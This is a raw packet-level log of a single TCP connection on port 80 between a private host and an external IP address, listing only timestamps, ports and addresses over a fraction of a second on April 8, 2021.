Apr 8, 2021 13:18:03.041852951 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.041889906 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.041941881 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042004108 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042006016 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042045116 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042084932 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042085886 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042092085 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042148113 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042160034 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042201042 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042205095 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042241096 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042244911 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042279959 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042292118 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042324066 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042327881 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042363882 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042362928 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042403936 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042408943 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042454004 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042467117 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042490959 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042495012 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042529106 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042530060 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042567968 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042568922 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042607069 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042608023 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042646885 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042663097 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042725086 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042754889 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042764902 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042764902 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042807102 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042815924 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042854071 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042855024 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042890072 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042890072 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042927980 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042928934 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042963982 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.042967081 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.042999983 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.043005943 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.043039083 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.043039083 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.043076992 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.043080091 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.043118954 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.043121099 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.043160915 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.043175936 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.043222904 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.043978930 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.161581993 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.161663055 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.161720037 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.161760092 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.161776066 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.161794901 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.161801100 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.161835909 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.161842108 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.161935091 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.161953926 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162038088 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162039995 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162087917 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162089109 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162136078 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162146091 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162198067 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162199974 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162245989 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162261963 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162313938 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162317991 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162368059 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162373066 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162420034 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162431955 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162496090 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162497997 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162548065 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162556887 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162601948 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162628889 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162688971 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162717104 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162779093 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162790060 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162841082 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.162853003 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162914991 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.162977934 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163042068 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163070917 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163088083 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163113117 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163176060 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163182020 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163233042 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163235903 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163285971 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163290977 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163347006 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163347960 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163391113 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163404942 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163408995 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163449049 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163460970 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163506985 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163516045 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163563967 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163568974 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163615942 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163630009 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163678885 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163707018 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163765907 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163796902 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163870096 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163877964 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.163932085 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.163950920 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164004087 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164077997 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164134026 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164135933 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164177895 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164191008 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164233923 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164247036 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164289951 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164308071 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164359093 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164362907 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164410114 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164410114 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164459944 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164467096 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164515018 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164520979 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164568901 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164619923 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164678097 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.164680004 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.164727926 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.166377068 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.283041000 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283083916 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283117056 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283149004 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283180952 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283211946 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283230066 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.283252954 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283272028 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.283276081 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.283289909 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.283303022 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.283334017 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284468889 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284506083 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284545898 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284575939 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284581900 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284603119 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284615993 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284617901 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284650087 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284676075 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284682989 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284686089 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284687996 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284718037 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284730911 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284751892 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284758091 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284785032 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284796000 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284826040 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284830093 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284862995 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284882069 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284898043 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284902096 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284945011 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.284948111 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284982920 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.284996033 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285015106 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285026073 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285048008 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285060883 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285080910 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285099983 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285121918 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285128117 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285159111 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285171986 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285192013 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285202980 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285224915 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285233021 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285259008 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285274982 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285295963 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285311937 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285329103 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285340071 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285362005 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285373926 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285403013 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285438061 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285480976 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285480976 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285517931 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285523891 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285551071 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285561085 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285583973 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285590887 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285618067 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285631895 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285650015 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285661936 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285685062 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285691977 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285718918 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285731077 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285759926 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285761118 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285801888 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285809040 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285839081 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285845995 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285871983 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285886049 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285906076 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.285919905 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285949945 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.285998106 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.401540995 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401601076 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401655912 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401716948 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401748896 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.401763916 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401782990 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.401787996 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.401818037 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.401837111 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401885986 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401894093 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.401923895 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.401932001 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.401989937 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402030945 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402040958 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402043104 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402085066 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402091980 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402127028 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402144909 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402179956 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402199984 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402241945 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402257919 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402280092 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402293921 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402322054 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.402328014 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.402368069 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.403976917 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404042959 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404090881 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404100895 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404139042 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404150963 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404189110 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404232979 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404237032 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404308081 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404325962 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404360056 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404366016 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404406071 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404438972 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404443026 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404454947 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404494047 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404496908 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404547930 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404556036 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404603958 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404607058 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404654980 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404663086 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404712915 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404712915 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404761076 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404774904 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404827118 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404828072 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404876947 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404886961 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404930115 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.404934883 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404978037 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.404978991 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405019999 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405025959 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405067921 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405072927 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405117035 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405119896 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405164957 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405179024 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405229092 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405232906 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405280113 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.405283928 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405327082 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:03.405329943 CEST	49171	80	192.168.2.22	23.95.122.24
